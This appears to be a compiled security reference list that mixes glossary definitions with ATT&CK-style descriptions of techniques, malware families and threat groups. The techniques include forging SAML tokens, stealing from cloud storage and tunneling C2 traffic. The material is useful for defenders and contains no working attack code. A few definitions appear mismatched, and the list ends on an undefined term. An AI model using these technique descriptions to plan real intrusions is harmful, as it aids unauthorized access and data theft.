Definition: A wireless metropolitan area network (WMAN) technology based on the IEEE 802.16 family of standards used for a variety of purposes, including, but not limited to, fixed last-mile broadband access, long-range wireless backhaul, and access layer technology for mobile wireless subscribers operating on telecommunications networks.

Name: Data from Cloud Storage
Type: attack-pattern
Description: Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. 

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the Cloud API. In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories). 

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem. There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

Term: firewall
Definition: A device or program that controls the flow of network traffic between networks or hosts that employ differing security postures.

Name: Bandwidth Hijacking
Type: attack-pattern
Description: Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 

Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate Network Denial of Service campaigns and/or to seed malicious torrents. Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services. Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.

In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.

Name: Asymmetric Cryptography
Type: attack-pattern
Description: Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as Asymmetric Cryptography.

Term: <em>w</em>
Definition: In XMSS, the length of a Winternitz chain. A single Winternitz chain uses log2(w) bits from the hash or checksum.

Name: SAML Tokens
Type: attack-pattern
Description: An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate. The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>. Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.

An adversary may utilize Private Keys to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate. This differs from Steal Application Access Token and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to Use Alternate Authentication Material, which may bypass multi-factor and other authentication protection mechanisms.

Term: security incident
Definition: A violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.

Term: <em>K2</em>
Definition: The second subkey.

Name: Identify Business Tempo
Type: attack-pattern
Description: Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise or Trusted Relationship)

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password); something you have (e.g., cryptographic identification device, token); or something you are (e.g., biometric). See authenticator.

Term: ID
Definition: The process of discovering the true identity (i.e., origin, initial history) of a person or item from the entire collection of similar persons or items.

Term: NC
Definition: A value that is used only once.

Term: risk escalation
Definition: Occurs when a particular threshold is reached, either based on a time frame or some other risk condition, thus requiring a higher level of attention. For example, a risk that has remained through more than two fiscal periods without adequate treatment might be flagged for additional scrutiny. Another condition for escalation might occur if, during risk monitoring, conditions indicate that the risk exposure rating will significantly exceed the initial estimates.

Term: key establishment
Definition: A procedure that results in establishing secret keying material that is shared among different parties.

Term: authorizing official designated representative
Definition: An organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with the authorization process.

Term: authorize processing
Definition: Access privileges that are granted to an entity that convey an “official” sanction to perform a security function or activity.

Term: Manage Privileges
Definition: See Capability, Privilege and Account Management.

Term: process
Definition: set of interrelated or interacting activities which transforms inputs into outputs

Term: Universal Serial Bus (USB)
Definition: Type of standard cable, connector, and protocol for connecting computers, electronic devices, and power sources.

Term: Data Encryption Standard
Definition: The symmetric encryption algorithm defined by the Data Encryption Standard (FIPS 46-2).

Term: DI
Definition: Assurance that the data are unchanged from creation to reception.

Name: Kevin
Type: malware
Description: Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.

Term: healthcare identifier
Definition: identifier of a person for exclusive use by a healthcare system

Term: data integrity
Definition: The property that data has not been altered in an unauthorized manner. Data integrity covers data in storage, during processing, and while in transit.

Name: Elise
Type: malware
Description: Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU.

Name: Windows Remote Management
Type: attack-pattern
Description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the `winrm` command or by any number of programs such as PowerShell. WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.

Term: mandatory access control (MAC)
Definition: An access control policy that is uniformly enforced across all subjects and objects within a system. A subject that has been granted access to information is constrained from: passing the information to unauthorized subjects or objects; granting its privileges to other subjects; changing one or more security attributes on subjects, objects, the system, or system components; choosing the security attributes to be associated with newly created or modified objects; or changing the rules for governing access control. Organization-defined subjects may explicitly be granted organization-defined privileges (i.e., they are trusted subjects) such that they are not limited by some or all of the above constraints. Mandatory access control is considered a type of nondiscretionary access control.

Term: attribute validation
Definition: Confirmation, through the provision of objective evidence, that the requirements for a specific intended use or application have been fulfilled.

Term: <em>[x]s</em>
Definition: The binary representation of the non-negative integer x, in s bits, where x<2s.

Term: authenticate
Definition: Provides assurance of the authenticity and, therefore, the integrity of data.

Term: Keyed-Hash Message Authentication Code
Definition: Keyed-Hash Message Authentication Code specified in [FIPS198].

Term: Archive
Definition: Long-term, physically separate storage.

Term: Pending transaction pool
Definition: A distributed queue where candidate transactions wait until they are added to the blockchain. Also known as memory pool, or mempool.

Term: categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.

Name: EVILNUM
Type: malware
Description: EVILNUM is fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group Evilnum which has the same name.

Term: Derived&nbsp;PIV&nbsp;Credential&nbsp;Issuer
Definition: Derived PIV Credential (and associated token) Issuer; an issuer of Derived PIV Credentials as defined in [NIST SP 800-63-2]and [NIST SP 800-157].

Term: central management
Definition: The organization-wide management and implementation of selected security controls and related processes. Central management includes planning, implementing, assessing, authorizing, and monitoring the organization-defined, centrally managed security controls and processes.

Term: FCKMS architecture
Definition: The structure of an operational FCKMS, including descriptions and diagrams of the types and locations of all its facilities, FCKMS modules, devices, support utilities, and communications.

Term: compromise
Definition: The unauthorized disclosure, modification or use of sensitive data (e.g., keying material and other security-related information).

Term: <em>nBits</em>
Definition: Length in bits of the RSA modulus n.

Name: StealBit
Type: malware
Description: StealBit is a data exfiltration tool that is developed and maintained by the operators of the the LockBit Ransomware-as-a-Service (RaaS) and offered to affiliates to exfiltrate data from compromised systems for double extortion purposes.

Term: OID
Definition: A globally unique identifier of a data object as defined in ISO/IEC 8824-2.

Term: compromise
Definition: The unauthorized disclosure, modification, substitution or use of sensitive key information (e.g., a secret key, private key, or secret metadata).

Name: VaporRage
Type: malware
Description: VaporRage is a shellcode downloader that has been used by APT29 since at least 2021.

Term: Best Practice
Definition: A procedure that has been shown by research and experience to produce optimal results and that is established or proposed as a standard suitable for widespread adoption.

Term: public key certificate
Definition: Also known as a digital certificate. A digital representation of information which at least
1. identifies the certification authority issuing it,
2. names or identifies its subscriber,
3. contains the subscriber's public key,
4. identifies its operational period, and
5. is digitally signed by the certification authority issuing it.

Term: Integrated Circuit Card Identification
Definition: a unique and immutable identifier maintained within the SIM.

Term: Security properties
Definition: The security features (e.g., entity authentication, replay protection, or key confirmation) that a cryptographic scheme may, or may not, provide.

Term: controlled cryptographic item (CCI) assembly
Definition: A device approved by the National Security Agency as a controlled cryptographic item that embodies a cryptographic logic or other cryptographic design. A CCI component does not perform the entire COMSEC function, and is dependent upon a host equipment or assembly to complete and operate the COMSEC function. Note: CCI component is a collective term and may refer to a single microcircuit, a module, a module set or assembly, a printed circuit board, or any combination of these items.

Term: Globally Unique Identifier
Definition: An identifier formatted following special conventions to support uniqueness within an organization and across all organizations creating identifiers. See Section 3.1.3 for the conventions.

Term: replay resistance
Definition: The property of an authentication process to resist replay attacks, typically by use of an authenticator output that is valid only for a specific authentication.

Term: MFA
Definition: An authentication system that requires more than one distinct authentication factor for successful authentication. Multifactor authentication can be performed using a multifactor authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.

Name: Virtual Machine Discovery
Type: attack-pattern
Description: An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a Hypervisor CLI such as `esxcli` or `vim-cmd` (e.g. `esxcli vm process list or vim-cmd vmsvc/getallvms`). Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host. 

Adversaries may use the information from Virtual Machine Discovery during discovery to shape follow-on behaviors. Subsequently discovered VMs may be leveraged for follow-on activities such as Service Stop or Data Encrypted for Impact.

Term: assurance of integrity
Definition: Guarding against improper information modification or destruction and ensuring information non-repudiation and authenticity.

Term: Round key
Definition: One of the&nbsp;<span class="math-tex">\(Nr+1\)</span>&nbsp;arrays of four words that are derived from the block cipher key using the key expansion routine; each round key is an input to an instance of ADDROUNDKEY() in the AES block cipher.

Name: Ke3chang
Type: intrusion-set
Description: Ke3chang is a threat group attributed to actors operating out of China. Ke3chang has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.

Term: certification
Definition: A designation earned to ensure qualifications to perform a job or task. Often issued by a professional organization, industry vendor, or employer to signify an achievement following a course of study.

Name: DRYHOOK
Type: malware
Description: DRYHOOK is Python script used to steal credentials. DRYHOOK was first reported in January 2025, and has previously been leveraged by People's Republic of China (PRC) state-affiliated threat actors identified as UNC5221 and SYLVANITE.

Term: Security Capability
Definition: See Capability, Security.

Term: CKMS Security Policy
Definition: A security policy specific to a CKMS

Term: Hypertext Transfer Protocol over Transport Layer Security
Definition: HTTP transmitted over TLS.

Term: IT System
Definition: See Information System

Term: Certificate-inventory management
Definition: See Key-inventory management.

Term: Equivalent inverse cipher
Definition: An alternative specification of the inverse of CIPHER() with a structure similar to that of CIPHER() and with a modified key schedule as input.

Term: Common Name
Definition: An attribute type that is commonly found within a Subject Distinguished Name in an X.500 directory information tree. When identifying machines, it is composed of a fully qualified domain name or IP address.

Term: evaluation criteria
Definition: The standards by which accomplishments of technical and operational effectiveness or suitability characteristics may be assessed. Evaluation criteria are a benchmark, standard, or factor against which conformance, performance, and suitability of a technical capability, activity, product, or plan is measured.

Term: subscriber
Definition: The individual who is the subject named or identified in a Derived PIV Authentication certificate and who holds the token that contains the private key that corresponds to the public key in the certificate.

Term: Universal Serial Bus (USB)
Definition: A hardware interface for low-speed peripherals such as the keyboard, mouse, joystick, scanner, printer, and telephony devices.

Name: MuddyViper
Type: malware
Description: MuddyViper is custom backdoor written in C and C++ used by MuddyWater for command and control (C2) communications and persistence. MuddyViper is loaded by Fooder and sends frequent messages to the C2 server.

Term: Public Reviewer
Definition: A member of the general public who reviews a candidate checklist and sends comments to NIST.

Term: controlled area
Definition: Any area or space for which the organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information or system.

Term: Signature verification
Definition: The process of using a digital signature algorithm and a public key to verify a digital signature on data.

Term: compromise
Definition: The unauthorized disclosure, modification, substitution or use of sensitive data (e.g., keying material and other security-related information).

Name: POWERSOURCE
Type: malware
Description: POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped.

Term: senior information security officer (SISO)
Definition: See Senior Agency Information Security Officer.

Term: P1,…,P64
Definition: Bits of the Plaintext Block

Term: Category
Definition: The subdivision of a Function into groups of privacy outcomes closely tied to programmatic needs and particular activities.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol that is widely implemented in browsers and web servers. TLS provides confidentiality, certificate-based authentication of the receiving (server) endpoint, and certificate-based authentication of the originating (client) endpoint. TLS is specified in [RFC8446] and [SP800-52].

Term: availability
Definition: Ensuring timely and reliable access to and use of information.
Note: Mission/business resiliency objectives extend the concept of availability to refer to a point-in-time availability (i.e., the system, component, or device is usable when needed) and the continuity of availability (i.e., the system, component, or device remains usable for the duration of the time it is needed).

Term: MOA
Definition: Memorandum of Agreement (as used in the context of this CP, between an Agency and the FPKIPA allowing interoperation between the FBCA and Agency Principal CA)

Term: information security architecture
Definition: An embedded, integral part of the enterprise architecture that describes the structure and behavior of the enterprise security processes, security systems, personnel and organizational subunits, showing their alignment with the enterprise’s mission and strategic plans. See security architecture.

Term: Non-Custodial
Definition: Refers to an application or process that does not require users to relinquish any control over their data or private keys.

Term: Electronic Serial Number (ESN)
Definition: A unique 32-bit number programmed into CDMA phones when they are manufactured.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, individuals, other organizations, or the Nation through a system via unauthorized access, destruction, disclosure, modification of information, or denial of service.

Term: <em>Dictionary</em>
Definition: A dynamic-length data structure that stores a collection of elements or values, where a unique label identifies each element. The label can be any data type.

Term: synthetic data generation
Definition: A process in which seed data are used to create artificial data that have some of the statistical characteristics of the seed data.

Term: Diffie-Hellman
Definition: The (non-cofactor) FFC Diffie-Hellman key-agreement primitive.

Term: Timestamp
Definition: A token of information that is used to provide assurance of timeliness; contains timestamped data, including time, and a signature generated by a Trusted Timestamp Authority (TTA).

Name: MailSniper
Type: tool
Description: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.

Name: Component Firmware
Type: attack-pattern
Description: Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

Term: X.509 certificate
Definition: The X.509 public-key certificate or the X.509 attribute certificate, as defined by the ISO/ITU-T X.509 standard. Most commonly (including in this document), an X.509 certificate refers to the X.509 public-key certificate.

Term: key-establishment key pair
Definition: A public key and its corresponding private key. A key pair is used with a public key algorithm.

Term: cyber incident
Definition: Any observable occurrence in a system.

Name: Application Developer Guidance
Type: course-of-action
Description: Application Developer Guidance focuses on providing developers with the knowledge, tools, and best practices needed to write secure code, reduce vulnerabilities, and implement secure design principles. By integrating security throughout the software development lifecycle (SDLC), this mitigation aims to prevent the introduction of exploitable weaknesses in applications, systems, and APIs. This mitigation can be implemented through the following measures:
 
Preventing SQL Injection (Secure Coding Practice):

- Implementation: Train developers to use parameterized queries or prepared statements instead of directly embedding user input into SQL queries.
- Use Case: A web application accepts user input to search a database. By sanitizing and validating user inputs, developers can prevent attackers from injecting malicious SQL commands.

Cross-Site Scripting (XSS) Mitigation:

- Implementation: Require developers to implement output encoding for all user-generated content displayed on a web page.
- Use Case: An e-commerce site allows users to leave product reviews. Properly encoding and escaping user inputs prevents malicious scripts from being executed in other users’ browsers.

Secure API Design:

- Implementation: Train developers to authenticate all API endpoints and avoid exposing sensitive information in API responses.
- Use Case: A mobile banking application uses APIs for account management. By enforcing token-based authentication for every API call, developers reduce the risk of unauthorized access.

Static Code Analysis in the Build Pipeline:

- Implementation: Incorporate tools into CI/CD pipelines to automatically scan for vulnerabilities during the build process.
- Use Case: A fintech company integrates static analysis tools to detect hardcoded credentials in their source code before deployment.

Threat Modeling in the Design Phase:

- Implementation: Use frameworks like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) to assess threats during application design.
- Use Case: Before launching a customer portal, a SaaS company identifies potential abuse cases, such as session hijacking, and designs mitigations like secure session management.

**Tools for Implementation**:

- Static Code Analysis Tools: Use tools that can scan for known vulnerabilities in source code.
- Dynamic Application Security Testing (DAST): Use tools like Burp Suite or OWASP ZAP to simulate runtime attacks and identify vulnerabilities.
- Secure Frameworks: Recommend secure-by-default frameworks (e.g., Django for Python, Spring Security for Java) that enforce security best practices.

Term: security information
Definition: Information within the system that can potentially impact the operation of security functions or the provision of security services in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data.

Term: ATO
Definition: seeCertificationandAccreditation.

Term: Affine Transformation
Definition: A transformation consisting of multiplication by a matrix followed by the addition of a vector.

Term: <em>W(S)</em>
Definition: The output of the wrapping function for KW and KWP applied to the bit string S.

Term: Log Analysis
Definition: Studying log entries to identify events of interest or suppress log entries for insignificant events.

Term: Semi-Qualitative Risk Analysis
Definition: A method for risk analysis with qualitative categories assigned numeric values to allow for the calculation of numeric results.

Term: logistic regression
Definition: A type of linear classifier that predicts the probability of an observation being part of a class.

Term: CM
Definition: A collection of activities focused on establishing and maintaining the integrity of products and systems, through control of the processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Term: Firewall Control Proxy
Definition: component that controls a firewall’s handling of a call. The firewall control proxy can instruct the firewall to open specific ports that are needed by a call, and direct the firewall to close these ports at call termination.

Term: Checklist Role
Definition: The primary use or function of the IT product as described by the checklist (e.g., client desktop host, web server, bastion host, network border protection, intrusion detection).

Name: HAFNIUM
Type: intrusion-set
Description: HAFNIUM is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. HAFNIUM primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has targeted remote management tools and cloud software for intial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices.

Name: ComRAT
Type: malware
Description: ComRAT is a second stage implant suspected of being a descendant of Agent.btz and used by Turla. The first version of ComRAT was identified in 2007, but the tool has undergone substantial development for many years since.

Term: memorized secret
Definition: A protected/private string of letters, numbers, and/or special characters used to authenticate an identity or to authorize access to data.

Term: COMSEC assembly
Definition: Group of parts, elements, subassemblies, or circuits that are removable items of COMSEC equipment. 
Rationale: The term falls under the broader term “COMSEC material”.

Name: HiddenFace
Type: malware
Description: HiddenFace is a modular backdoor developed and used exclusively by MirrorFace since at least 2021. HiddenFace can communicate both actively and passively and has been used against political and academic targets.

Term: genomic information
Definition: information based on an individual’s genome, such as a sequence of DNA or the results of genetic testing

Term: SAISO
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. 
[Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses.
Note 2: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: enhanced security requirements
Definition: Security requirements that are to be implemented in addition to the basic and derived security requirements in NIST Special Publication 800-171. The additional security requirements provide the foundation for a defense-in-depth protection strategy that includes three mutually supportive and reinforcing components: (1) penetration-resistant architecture, (2) damage-limiting operations, and (3) designing for cyber resiliency and survivability.

Term: <em>[x]s</em>
Definition: The binary representation of the non-negative integer x as a string of s bits, where x<2s.

Term: Threat Assessment/Analysis
Definition: The examination of threat sources against system vulnerabilities to determine the threats for a particular system in a particular operational environment.

Term: Integrity authentication
Definition: A physical or cryptographic means of providing assurance that information has not been altered in an unauthorized manner since it was created, transmitted, or stored.

Term: <em>CIPH-1K(X)</em>
Definition: The output of the inverse of the designated cipher function of the block cipher under the key K applied to the block X.

Term: communications cover
Definition: Result of measures used to obfuscate message externals to resist traffic analysis.

Term: domain
Definition: An environment or context that includes a set of system resources and a set of system entities that have the right to access the resources as defined by a common security policy, security model, or security architecture. See Security Domain.

Term: NIST Special Publication
Definition: Include proceedings of conferences sponsored by NIST, NIST annual reports, and other special publications appropriate to this grouping such as wall charts, pocket cards, and bibliographies.

Term: spyware
Definition: Software that is secretly or surreptitiously installed into an information system to gather information on individuals or organizations without their knowledge; a type of malicious code.

Term: safeguards
Definition: Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of an information system. Synonymous with security controls and safeguards.

Term: On-Demand Scanning
Definition: Allowing users to launch security tool scans for malware on a computer as desired.

Term: Platform Trust
Definition: An assurance in the integrity of the underlying platform configuration, including hardware, firmware, and software.

Term: Distribution
Definition: The transport of a key and other keying material from an entity that either owns the key or generates the key to another entity that is intended to use the key.

Name: Protocol Tunneling
Type: attack-pattern
Description: Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel. 

Protocol Tunneling may also be abused by adversaries during Dynamic Resolution. Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets. 

Adversaries may also leverage Protocol Tunneling in conjunction with Proxy and/or Protocol or Service Impersonation to further conceal C2 communications and infrastructure.

Name: GoldenSpy
Type: malware
Description: GoldenSpy is a backdoor malware which has been packaged with legitimate tax preparation software. GoldenSpy was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed for a particular component, subsystem, system, network, application, mission, enterprise, or other entity.

Term: Archive facility
Definition: Verb: To place a cryptographic key and/or metadata into long-term storage that will be maintained even if the storage technology changes.

Name: CallMe
Type: malware
Description: CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell.

Name: IDE Extensions
Type: attack-pattern
Description: Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems. IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., Compromise Software Dependencies and Development Tools) or side-loaded directly into the IDE. 

In addition to installing malicious extensions, adversaries may also leverage benign ones. For example, adversaries may establish persistent SSH tunnels via the use of the VSCode Remote SSH extension (i.e., IDE Tunneling). 

Trust is typically established through the installation process; once installed, the malicious extension is run every time that the IDE is launched. The extension can then be used to execute arbitrary code, establish a backdoor, mine cryptocurrency, or exfiltrate data.

Term: SISO
Definition: See Senior Agency Information Security Officer.

Term: Hardware root of trust
Definition: An inherently trusted combination of hardware and firmware that maintains the integrity of information.

Term: Key wrapping
Definition: A method of protecting keying material (along with associated integrity information) that provides both confidentiality and integrity protection when using a symmetric-key algorithm.

Term: assessment activities
Definition: An assessment object that includes specific protection related pursuits or actions supporting an information system that involve people (e.g., conducting system backup operations, monitoring network traffic).

Term: information type
Definition: A specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor sensitive, security management), defined by an organization or, in some instances, by a specific law, Executive Order, directive, policy, or regulation.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: Notary
Definition: A trusted entity that submits transactions across blockchains on behalf of users, often with respect to tokens the users have previously locked up.

Term: KMPS
Definition: A document or set of documents that describes, in detail, the organizational structure, responsible roles, and organization rules for the functions identified in the Key Management Policy.

Term: common vulnerability scoring system (CVSS)
Definition: An SCAP specification for communicating the characteristics of vulnerabilities and measuring their relative severity.

Name: Audio-Visual Content
Type: attack-pattern
Description: Adversaries may create or manipulate audio, image, and video content to support targeting and malicious operations. Adversaries may also use synthetic voice recordings, real-time altered audio or video during live interactions, fabricated profile photos and identity documents, or video content depicting fabricated or impersonated individuals.

Content may be produced manually through editing tools, generated using AI-assisted tools, or produced using third-party synthetic services. AI-assisted tools have enabled adversaries to produce synthetic media at scale and generate content that is more difficult to identify as inauthentic. 

Audio-visual content produced through these methods may be used in support of other techniques, such as Phishing, Spearphishing via Service, Phishing for Information, Internal Spearphishing, Social Engineering, Financial Theft, or Establish Accounts.

Name: RustyWater
Type: malware
Description: RustyWater is a Rust-based implant used by MuddyWater. Historically, MuddyWater has used PowerShell-based tools and RustyWater reflects a shift in tooling, demonstrating better techniques for defense evasion and reverse engineering.

Term: Additional input
Definition: Information known by two parties that is cryptographically bound to the secret keying material being protected using the encryption operation.

Name: External Defacement
Type: attack-pattern
Description: An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. External Defacement may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda. External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.

Term: MFA
Definition: An authentication system or an authenticator that requires more than one authentication factor for successful authentication. Multi-factor authentication can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors.

Term: ADRS<sup>C</sup>
Definition: Compressed Address

Term: BGP Speaker
Definition: Any router running the BGP protocol.

Name: APT38
Type: intrusion-set
Description: APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau. Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext and Banco de Chile ; some of their attacks have been destructive.

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

Term: IR
Definition: The remediation or mitigation of violations of security policies and recommended practices.

Term: information system-related security risks
Definition: Information system-related security risks are those risks that arise through the loss of confidentiality, integrity, or availability of information or information systems and consider impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation. 
See Risk.

Term: Global System for Mobile Communications (GSM)
Definition: a set of standards for second generation cellular networks currently maintained by the 3rd Generation Partnership Project (3GPP).

Term: domain
Definition: See security domain.

Term: behavior analysis
Definition: The act of examining malware interactions within its operating environment including file systems, the registry (if on Windows), the network, as well as other processes and Operating System components.

Term: Stateful Protocol Analysis
Definition: A firewalling capability that improves upon standard stateful inspection by adding basic intrusion detection technology. This technology consists of an inspection engine that analyzes protocols at the application layer to compare vendor-developed profiles of benign protocol activity against observed events to identify deviations, allowing a firewall to allow or deny access based on how an application is running over a network.

Term: digital identity
Definition: The set of physical and behavioral characteristics by which an individual is uniquely recognizable.

Name: WellMess
Type: malware
Description: WellMess is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by APT29.

Term: OtherInput
Definition: Other information for key derivation; a bit string.

Term: consumer-grade router device
Definition: Networking devices that are primarily intended for residential use and can be installed by the customer. Routers forward data packets, most commonly Internet Protocol (IP) packets, between networked systems.

Term: token
Definition: A physical object a user possesses and controls that is used to authenticate the user’s identity.

Term: <em>Dataset</em>
Definition: A sequence of sample values. (See Sample.)

Term: Key revocation
Definition: A possible function in the lifecycle of a cryptographic key; a process whereby a notice is made available to affected entities that the key should be removed from operational use prior to the end of the established cryptoperiod of that key.

Term: IoT Product
